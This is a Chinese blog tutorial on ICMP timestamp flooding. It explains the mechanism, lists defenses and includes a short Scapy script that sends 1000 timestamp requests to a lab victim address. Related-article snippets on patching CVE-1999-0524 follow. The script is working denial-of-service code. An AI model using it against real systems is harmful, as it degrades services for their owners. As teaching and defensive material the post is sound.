使用 Scapy 库编写 ICMP 时间戳攻击脚本

最新推荐文章于 2025-04-21 10:28:17 发布
最新推荐文章于 2025-04-21 10:28:17 发布
阅读量7.9k 收藏 9
点赞数 11
分类专栏: # 网络协议分析 文章标签: 安全 网络 web安全 网络安全 信息与通信 网络协议 tcp/ip
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-NC-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_82189125/article/details/139301116
版权

一、介绍

ICMP时间戳攻击(ICMP Timestamp Attack)是一种利用ICMP协议中的Timestamp请求和响应消息来实施的攻击。攻击者发送大量的ICMP Timestamp请求消息到目标主机,以触发目标主机对每个请求进行响应,从而消耗目标系统的网络资源和带宽,导致服务不可用或严重受限。

1.1 ICMP时间戳攻击的工作原理

ICMP(Internet Control Message Protocol)是用于在IP网络上传递控制消息的协议。其中,Timestamp请求和响应消息用于获取目标系统的当前时间戳信息。攻击者利用这一特性,发送大量的ICMP Timestamp请求消息到目标系统,诱使目标系统对每个请求进行响应。由于每个响应消息都需要消耗目标系统的网络资源和带宽,攻击者通过发送大量的请求消息,可以使目标系统的网络性能受到严重影响。

1.2 ICMP时间戳攻击的主要特点

  1. 大量的ICMP请求消息:攻击者发送大量的ICMP Timestamp请求消息到目标系统,以触发对每个请求的响应。
  2. 消耗网络资源和带宽:目标系统在响应大量的ICMP请求消息时,消耗大量的网络资源和带宽,导致网络性能下降或服务不可用。
  3. 源IP地址伪造:攻击者通常会伪造ICMP请求消息的源IP地址,以避免被追踪和识别,增加攻击的匿名性。

1.3 防御 ICMP 时间戳攻击的措施

  1. 流量过滤:在网络边界或目标系统上实施流量过滤,识别和丢弃源IP地址为攻击者的ICMP请求消息。可以使用防火墙、入侵检测系统(IDS)或专门的洪水攻击检测和防御设备来实现流量过滤。

  2. 限制 ICMP 响应:在目标系统上配置限制,限制对ICMP Timestamp请求消息的响应数量,以防止被用于进行攻击。可以通过修改操作系统的参数或使用防火墙规则来实现限制。

  3. 源IP地址验证:在网络边界或目标系统上实施源IP地址验证机制,验证传入的ICMP请求消息的源IP地址的合法性。这可以帮助过滤掉伪造的ICMP请求消息。

  4. 流量监控和分析:定期监控和分析网络流量,及时发现异常的ICMP流量模式,以及可能是时间戳攻击的迹象。使用网络流量分析工具和入侵检测系统来辅助监控和分析。

通过综合使用上述防御措施,可以有效地保护网络免受ICMP时间戳攻击的影响,维护网络的可用性和稳定性。

二、实验环境

受害者:192.168.134.148

三、实操演示

以下是一种使用Python和Scapy库实现ICMP时间戳攻击的简单方法:

from scapy.all import *
from scapy.layers.inet import ICMP


def icmp_timestamp_attack(target_ip, count):
    # 构造ICMP Timestamp请求消息
    icmp_packet = IP(dst=target_ip) / ICMP(type=13, code=0)  # type=13表示Timestamp请求,code=0表示该请求的子类型

    # 发送大量的ICMP消息
    send(icmp_packet, count=count)


if __name__ == "__main__":
    target_ip = "192.168.134.148"  # 目标系统的IP地址
    count = 1000  # 要发送的ICMP消息数量
    icmp_timestamp_attack(target_ip, count)

解决ICMP timestamp请求响应漏洞:在您的防火墙上过滤外来的ICMP timestamp(类型 13)报文以及外出的ICMP timestamp回复报文
郝开的博客
03-11 1126
解决ICMP timestamp请求响应漏洞:在您的防火墙上过滤外来的ICMP timestamp(类型 13)报文以及外出的ICMP timestamp回复报文
ICMP时间戳请求发送
10-29
一个对ICMP时间戳请求报文发送的实现。网上大部分是linux的代码,CPP的很少,这里上传一个CPP的
使用 Python 代码实现 ICMP Timestamp 请求和回应
Flag少侠的博客
04-26 759
【代码】使用 Python 代码实现 ICMP Timestamp 请求和回应。
ICMP timestamp请求响应漏洞处理(CVE-1999-0524)
热门推荐
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
02-24 4万+
一、漏洞描述 漏洞描述:远程主机响应ICMP时间戳请求。 时间戳回复是回复时间戳消息的ICMP消息。 它由时间戳的发送者发送的始发时间戳以及接收时间戳和发送时间戳组成。 这个信息理论上可以用来开发其他服务中基于时间的弱随机数发生器。 风险级别低。 二、加固处理 1)防火墙上过滤外来(INPUT)的ICMP timestamp(类型13)报文以及外出(OUTPUT)的ICMP timestamp回复报文 即在防火墙上禁用ICMP timestamp-request;或在系统内置防火墙上编辑iptable规则
ICMP 获取时间戳 (原始套接字)
weixin_30570101的博客
04-29 362
View Code 函数及变量的解释: WSADATA : 存储由WSAStartup函数返回的数据。 int WSAStartup( WORD wVersionRequested, LPWSADATA lpWSAData);  启动异步套接字,加载运行   wVersionRequest : 高阶字段表示小版本号,低位字段表示主版本号   lpWSAData: 指向WSAD...
LINUX: 漏洞 ICMP timestamp请求响应漏洞、允许Traceroute探测
weixin_72585038的博客
01-08 876
操作系统:CentOS Linux release 7.5.1804 (Core)
【绿冰壶的脚本小屋】第二期:基于icmp协议开发简易ping工具
qq_42551635的博客
08-08 780
【绿冰壶的脚本小屋】第二期:基于ICMP协议开发简易ping工具 任务目标:编写程序使用 ICMP 协议探测主机是否存活 任务要求: 1、理解ICMP协议的原理 2、实现代码,尽可能多的实现探测主机是否存活的功能 扩展任务:使用多线程技术提升探测速度 实验环境;python3 pycharm 前言 来到了脚本开发的第二部分,这次我们还是要从认识一个新的网络协议出发,开发相应的python脚本,并且学习如何使用多线程来提高效率. ICMP协议 ICMP(Internet Control Message Pro
时间戳爆破
03-29
### 时间戳爆破技术及相关原理 时间戳爆破是一种利用 ICMP 协议中的时间戳请求功能进行信息泄露或...以上脚本展示了如何使用 Scapy 构建并解析 ICMP 时间戳请求应答的过程。请注意仅限合法授权下的测试用途! ---
脚本自动化教程】:编写自定义traceroute脚本提升网络管理效率
脚本自动化指的是使用脚本语言编写程序来自动化完成一些重复性任务。这不仅可以大幅度减少人为操作错误,提高工作效率,还可以在长时间内保持高效稳定的作业性能。对于5年以上的IT从业者而言,掌握脚本自动化技术,...
网络分析自动化】:编写SharpPcap脚本实现高效网络数据处理
本文首先介绍了自动化网络分析的基础知识和环境搭建,然后深入探讨了使用SharpPcap进行数据捕获的原理和实践操作。随后,文章转向数据包解析、统计分析及高级数据处理脚本编写。接下来,论述了如何通过自动化手段...
故障诊断必修课:ICMP协议在网络安全中的角色:如何识别和防御网络攻击
![故障诊断必修课:ICMP协议在网络安全中的角色:如何识别和防御网络攻击]...进一步地,本文详细介绍了ICMP的监控诊断技术,包括追踪请求响应、实时监控异常检测以及定制化诊断脚本编写。此
ICMP timestamp请求响应漏洞
qq_32054169的博客
05-16 2万+
漏洞描述 远程主机会回复ICMP_TIMESTAMP查询并返回它们系统的当前时间。 这可能允许攻击攻击一些基于时间认证的协议。 解决方案 NSFOCUS建议您采取以下措施以降低威胁: * 在您的防火墙上过滤外来的ICMP timestamp(类型 13)报文以及外出的ICMP timestamp回复报文。 具体解决方式就是禁用ICMP timestamp-request,编辑etc/sy...
模拟ICMP过程
lycommand的专栏
12-18 908
首先建立common头文件 ////////////////////////////////////////////////// // comm.h文件 // 包含一些公共函数 #ifndef __COMM_H__ #define __COMM_H__ // 校验和的计算 // 以16位的字为单位将缓冲区的内容相加,如果缓冲区长度为奇数, // 则再加上一个字节。它们的和存入一个32位的双
【漏洞防范应对:从发现到修复的全攻略】ICMP timestamp请求响应漏洞,CVE编号:CVE-1999-0524,处理过程详解!!!
大唐有趣的小胡.
05-11 6334
本文详细介绍了ICMP timestamp请求响应漏洞(CVE-1999-0524)的发现修复全过程。该漏洞允许远程攻击者通过ICMP_TIMESTAMP查询获取系统时间,进而可能攻击基于时间认证的协议。文章提供了两种修复方法:使用firewalld或iptables来阻止ICMP timestamp请求和回复。修复步骤包括检查防火墙状态、添加阻止规则并重新加载配置。最后,文章强调了验证修复效果的重要性,并提醒运维人员在启动防火墙前需确认所有业务通信需求并规划好放行策略。通过本文的指南,读者可以有效地防范
ICMP timestamp 协议原理和实现
tyler_download的专栏
02-09 6887
大量的设备连接到互联网,而设备之间需要通讯以及相互协作,这就要求不同设备之间需要保持时钟同步。然而无论是多么精准的时钟,一旦运行久了后,它指示的时间真实时间会产生偏差,在假设不同设备启动时时间初始化不同,这就很难保证不同设备之间的时钟频率还能够保持一致。 TCP/IP协议在创建时就已经意识到,不同设备间一旦时钟不同频就可能导致相互协作出现问题。于是就想构造出一套协议让不同设备间相互协商,然后确保...
网络协议攻击模拟_04ICMP协议ICMP重定向
fencecat的博客
01-13 2265
重定向是ICMP控制报文中的一种,在某一种特定的情况下,当路由器检测到一台机器使用的是非优化路由的时候,这个时候路由器回会主机发送ICMP重定向报文,使得它走优化路由。
Linux漏洞修复:禁用外来的ICMP timestamp和禁止Traceroute探测
最新发布
weixin_43993310的博客
04-21 978
禁用外来的ICMP timestamp和禁止Traceroute探测漏洞修复
uniapp Sass @import rules are deprecated and will be removed in Dart Sass 3.0.0.
03-15
### 如何解决 UniApp 中 Sass `@import` 规则废弃的问题 随着 Dart Sass 的发展,`@import` 规则已被标记为弃用,并将在未来的版本中移除。因此,在开发过程中可能会遇到类似于 “Sass @import rules are deprecated and will be removed in Dart Sass 3.0.0.” 这样的警告信息[^1]。 #### 使用 `@use` 替代 `@import` Dart Sass 推荐使用 `@use` 来替代传统的 `@import` 方法来加载模块化样式文件。以下是具体的实现方式: ```html <style lang="scss"> @use './style/index.scss'; </style> ``` 通过上述代码片段可以引入指定路径下的 SCSS 文件[^3]。需要注意的是,`@use` 不仅会导入变量、函数和混合器,还会创建命名空间以便于管理不同模块中的同名定义。 #### 配置 Nuxt 或 VuePress (如果适用) 对于基于框架的应用程序(如 Nuxt),可以通过调整构建工具链设置减少此类错误提示。例如,在 `nuxt.config.ts` 文件里加入如下选项可能有助于缓解部分兼容性问题: ```typescript export default defineNuxtConfig({ vite: { css: { preprocessorOptions: { scss: { api: 'modern-compiler' } } } } }) ``` 此配置项告知 Vite 使用现代编译模式处理 CSS/SCSS 资源[^4]。尽管这是针对 Nuxt 提供的例子,但对于其他前端框架也有一定的借鉴意义。 #### 更新 Node.js 和重装依赖包 有时,环境因素也可能引发类似的错误消息。比如旧版 Node.js 可能无法完全支持最新版本的 npm 包或者其内部逻辑有所改变从而触发额外告警。此时建议尝试升级到 LTS 版本并清理缓存后再执行一次完整的依赖安装过程: ```bash # 升级Node.js至LTS版本 nvm install --lts && nvm use --lts # 删除现有node_modules目录以及package-lock.json/yarn.lock锁文件 rm -rf ./node_modules package-lock.json yarn.lock # 安装最新的sass单独测试效果 npm install sass # 正常恢复全部生产&开发所需组件 npm install ``` 以上操作能够有效排除因本地运行时差异所造成的异常状况[^2]。 --- ### 注意事项 当切换到新的语法结构后,请务必确认原有项目的全局变量声明形式是否仍然适配新标准;必要情况下需重构这些共享资源以适应更严格的语义约束。 ---
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

苒汐在想你ᵃ

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值